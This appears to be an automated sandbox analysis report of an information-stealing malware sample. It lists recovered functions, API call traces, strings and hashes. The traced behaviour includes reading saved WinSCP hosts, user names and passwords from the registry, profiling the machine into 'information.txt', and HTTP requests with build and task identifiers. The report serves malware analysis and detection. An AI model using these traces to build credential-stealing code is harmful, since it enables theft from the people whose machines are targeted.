Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
String ID: ------$"$--$------$=tA$ERROR$block$build_id$file_data
API String ID: 1603122859-1039408876
Opcode ID: 1c1ffefa2ff13fbe326aa9203372af6fb0db7731481744ecb8c0260a5eb49208
Instruction ID: 5c63602dc81e6f21b2342bf72322e36899336e6e37317e40e758c60d5b7de2b6
Opcode Fuzzy Hash: 1c1ffefa2ff13fbe326aa9203372af6fb0db7731481744ecb8c0260a5eb49208
Instruction Fuzzy Hash: 5E42DB72D10109AADB14FBA1DC92DEE7778AF54304F50817EB212724D1EF386A4DCBA8

Function 0040E3C0 Relevance: 58.1, APIs: 19, Strings: 14, Instructions: 384
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0040E3E4
memset.MSVCRT ref: 0040E3FE
memset.MSVCRT ref: 0040E40C
memset.MSVCRT ref: 0040E41A
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E442
RegGetValueA.ADVAPI32(00416CFD,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E467
RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E475

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4AF
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E4C9
RegEnumKeyExA.ADVAPI32(00416CFD,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E4E7
RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4FD
RegGetValueA.ADVAPI32(00416CFD,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,004201E9), ref: 0040E58A
RegGetValueA.ADVAPI32(00416CFD,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E5D5
RegGetValueA.ADVAPI32(00416CFD,?,UserName,00000002,00000000,?,?,00000000,?,Login: ,00000000,?,:22), ref: 0040E682
RegGetValueA.ADVAPI32(00416CFD,?,Password,00000002,00000000,?,?,00000000,?,00423408,00000000,?,?), ref: 0040E6F4
StrCmpCA.SHLWAPI(?,004201E9,00000000,?,Password: ,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E724
RegEnumKeyExA.ADVAPI32(00416CFD,?,?,00000104,00000000,00000000,00000000,00000000,00000000,?,00423684), ref: 0040E7D7
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E7F1
RegCloseKey.ADVAPI32(00416CFD), ref: 0040E848

Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000008,?,75A8EC10,75AA5460,00000000), ref: 0040DDD8
Part of subcall function 0040DD90: HeapAlloc.KERNEL32(00000000), ref: 0040DDDF
Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDF4
Part of subcall function 0040DD90: HeapFree.KERNEL32(00000000), ref: 0040DDFB

Strings

Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E4BF
Security, xrefs: 0040E461
Password, xrefs: 0040E6E7
Login: , xrefs: 0040E63C
Host: , xrefs: 0040E544
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E42F
UserName, xrefs: 0040E675
:22, xrefs: 0040E614
Password: , xrefs: 0040E6F6
Soft: WinSCP, xrefs: 0040E522
UseMasterPassword, xrefs: 0040E45C
PortNumber, xrefs: 0040E5C1
passwords.txt, xrefs: 0040E806
HostName, xrefs: 0040E57D

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Value$CloseHeapmemset$EnumOpenProcesslstrcpylstrlen$AllocFreelstrcat
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 376919160-2798830873
Opcode ID: 2a604499cc5fb1fbc1fa5b3e87ccd38f4035980184baed312169c8e40c75f4d7
Instruction ID: ae86b70a3009f92c38161279bc2e3da00af9fe4ff8be4466f6dea0ea82a0e72c
Opcode Fuzzy Hash: 2a604499cc5fb1fbc1fa5b3e87ccd38f4035980184baed312169c8e40c75f4d7
Instruction Fuzzy Hash: 7BD11DB2910119AEDB24EBA1DC91EEEB37CAF54304F50457EF105B2591EB386B48CB68

Function 004144B0 Relevance: 48.1, APIs: 2, Strings: 25, Instructions: 834
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040FB60: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB6E
Part of subcall function 0040FB60: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB75
Part of subcall function 0040FB60: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB81
Part of subcall function 0040FB60: wsprintfA.USER32 ref: 0040FBAD

Part of subcall function 00410340: memset.MSVCRT ref: 00410365
Part of subcall function 00410340: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
Part of subcall function 00410340: RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
Part of subcall function 00410340: RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
Part of subcall function 00410340: CharToOemA.USER32(00000000,?), ref: 004103C2

Part of subcall function 004103E0: GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00423684,00000000,?,00000000,00000000,004201E9), ref: 00414728

Part of subcall function 00411090: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
Part of subcall function 00411090: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
Part of subcall function 00411090: CloseHandle.KERNEL32(00000000), ref: 004110C7

Part of subcall function 004105A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
Part of subcall function 004105A0: HeapAlloc.KERNEL32(00000000), ref: 004105BC

Part of subcall function 00410730: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
Part of subcall function 00410730: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
Part of subcall function 00410730: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
Part of subcall function 00410730: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
Part of subcall function 00410730: VariantInit.OLEAUT32(?), ref: 0041081B

Part of subcall function 00410900: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
Part of subcall function 00410900: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
Part of subcall function 00410900: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
Part of subcall function 00410900: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
Part of subcall function 00410900: VariantInit.OLEAUT32(?), ref: 004109E3

Part of subcall function 0040FB20: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 0040FB2C
Part of subcall function 0040FB20: HeapAlloc.KERNEL32(00000000,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000,00000000), ref: 0040FB33
Part of subcall function 0040FB20: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FB47

Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07

Part of subcall function 004102C0: CreateDCA.GDI32(00E4EE08,00000000,00000000,00000000), ref: 004102D2
Part of subcall function 004102C0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004102DD
Part of subcall function 004102C0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004102E8
Part of subcall function 004102C0: ReleaseDC.USER32(00000000,00000000), ref: 004102F3
Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000), ref: 00410300
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410307
Part of subcall function 004102C0: wsprintfA.USER32 ref: 00410317

Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
Part of subcall function 0040FC30: LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
Part of subcall function 0040FC30: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93
Part of subcall function 0040FC30: LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16

Part of subcall function 0040FBC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
Part of subcall function 0040FBC0: HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
Part of subcall function 0040FBC0: GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
Part of subcall function 0040FBC0: wsprintfA.USER32 ref: 0040FC12

Part of subcall function 0040FD30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
Part of subcall function 0040FD30: HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
Part of subcall function 0040FD30: RegOpenKeyExA.KERNEL32(80000002,00E50640,00000000,00020119,00000000), ref: 0040FD6B
Part of subcall function 0040FD30: RegQueryValueExA.KERNEL32(00000000,00E595F0,00000000,00000000,00000000,000000FF), ref: 0040FD86
Part of subcall function 0040FD30: RegCloseKey.ADVAPI32(00000000), ref: 0040FD90

Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE02
Part of subcall function 0040FDE0: GetLastError.KERNEL32(?,00000030), ref: 0040FE10
Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE48
Part of subcall function 0040FDE0: wsprintfA.USER32 ref: 0040FE92

Part of subcall function 0040FDA0: GetSystemInfo.KERNEL32(00000000), ref: 0040FDAD
Part of subcall function 0040FDA0: wsprintfA.USER32 ref: 0040FDC3

Part of subcall function 0040FED0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
Part of subcall function 0040FED0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
Part of subcall function 0040FED0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
Part of subcall function 0040FED0: wsprintfA.USER32 ref: 0040FF2B

Part of subcall function 0040FF40: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040FF71
Part of subcall function 0040FF40: EnumDisplayDevicesA.USER32(00000000,00000001,000001A8,00000001), ref: 0040FFA9

Part of subcall function 00410200: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
Part of subcall function 00410200: Process32First.KERNEL32(00000000,00000128), ref: 00410238
Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041024A
Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
Part of subcall function 00410200: CloseHandle.KERNEL32(00000000), ref: 004102A9

Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,00E56B78,00000000,00020019,00000000,004201E9), ref: 00410009

Part of subcall function 0040FFC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
Part of subcall function 0040FFC0: wsprintfA.USER32 ref: 0041007C
Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,00E5A2C0,00000000,000F003F,?,00000400), ref: 004100CA
Part of subcall function 0040FFC0: lstrlenA.KERNEL32(?), ref: 004100DF
Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,00E5A2A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156

lstrlenA.KERNEL32(00000000,00000000,?,00423684,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414F07

Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Strings

Work Dir: In memory, xrefs: 00414783
Display Resolution: , xrefs: 004149E8
[Software], xrefs: 00414E4C
MachineID: , xrefs: 004145B3
User Name: , xrefs: 00414981
[Processes], xrefs: 00414DD6
Computer Name: , xrefs: 0041491A
GUID: , xrefs: 0041461A
RAM: , xrefs: 00414CF9
[Hardware], xrefs: 00414BA2
Install Date: , xrefs: 0041482E
TimeZone: , xrefs: 00414B3B
Threads: , xrefs: 00414C92
VideoCard: , xrefs: 00414D60
Windows: , xrefs: 004147C7
Version: , xrefs: 004144C3
Processor: , xrefs: 00414BC4
Local Time: , xrefs: 00414AD4
Keyboard Languages: , xrefs: 00414A5E
Date: , xrefs: 0041454C
Cores: , xrefs: 00414C2B
Path: , xrefs: 00414706
information.txt, xrefs: 00414F1C
AV: , xrefs: 004148A4
HWID: , xrefs: 00414690

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$CloseInformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 521975125-1014693891
Opcode ID: 5435da33b2de04845b7793e5cb1a589c3754c45eed5c8e45830fad84ddd5cd33
Instruction ID: ed390803ddffb7dbb27509b1d163b9a87a989646b63db68027920e85455424b0
Opcode Fuzzy Hash: 5435da33b2de04845b7793e5cb1a589c3754c45eed5c8e45830fad84ddd5cd33
Instruction Fuzzy Hash: 2D623073D101086EDB15FBA1D952DDEB3789E14304B6482BFB112728D2AF397B0DCA69

Function 00405220 Relevance: 48.0, APIs: 21, Strings: 6, Instructions: 753
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004052AC
StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,00000000), ref: 004052C7
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040540D
HttpOpenRequestA.WININET(00000000,00E59F78,?,00E5ADC8,00000000,00000000,-00400100,00000000), ref: 00405449
lstrlenA.KERNEL32(00000000,00000000,004138CC,?,00000000,004138CC,",00000000,004138CC,status,00000000,004138CC,00E501A0,00000000,004138CC,00423358), ref: 004059B3
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059C4
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059CF
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059D6
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004059E7
memcpy.MSVCRT ref: 004059F8
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405A09
lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405A22
memcpy.MSVCRT ref: 00405A2B
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405A3E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405A4F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405A66
InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 00405AB5
InternetCloseHandle.WININET(00000000), ref: 00405AC0
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040546D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

InternetCloseHandle.WININET(00000000), ref: 00405ACA
InternetCloseHandle.WININET(00000000), ref: 00405AD7

Strings

task_id, xrefs: 0040582F
", xrefs: 00405520, 00405630, 00405741, 00405851, 00405964
build_id, xrefs: 0040560E
status, xrefs: 00405942
mode, xrefs: 0040571F
------, xrefs: 00405332, 00405473, 00405585, 00405697, 004057A6, 004058B9

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$------$build_id$mode$status$task_id
API String ID: 530647464-4141295817
Opcode ID: 1597b96bffe96788ee6993590e7cffb482aec3e3c9d9bf104e0acf383e87caea
Instruction ID: 5e4698c0f8782886daf2421da86d2cafb9983bd3f54ffb23d2de9c830c1f077e
Opcode Fuzzy Hash: 1597b96bffe96788ee6993590e7cffb482aec3e3c9d9bf104e0acf383e87caea
Instruction Fuzzy Hash: 7C52DE72910109AEDB15FBA1DC92EEE7778AF14704F54817EB112724D1EF382B4DCAA8

Function 00405BB0 Relevance: 44.3, APIs: 21, Strings: 4, Instructions: 584
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,00000030), ref: 00405C57
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405D9D
HttpOpenRequestA.WININET(00000000,00E59F78,?,00E5ADC8,00000000,00000000,-00400100,00000000), ref: 00405DD9
lstrlenA.KERNEL32(00000000,00000000,00416BDF,?,00000000,00416BDF,",00000000,00416BDF,mode,00000000,00416BDF,00E501A0,00000000,00416BDF,00423358), ref: 0040611D
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 0040612E
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406139
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406140
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406151
memcpy.MSVCRT ref: 00406162
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00406173
lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0040618C
memcpy.MSVCRT ref: 00406195
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004061A8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004061B9
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004061D0
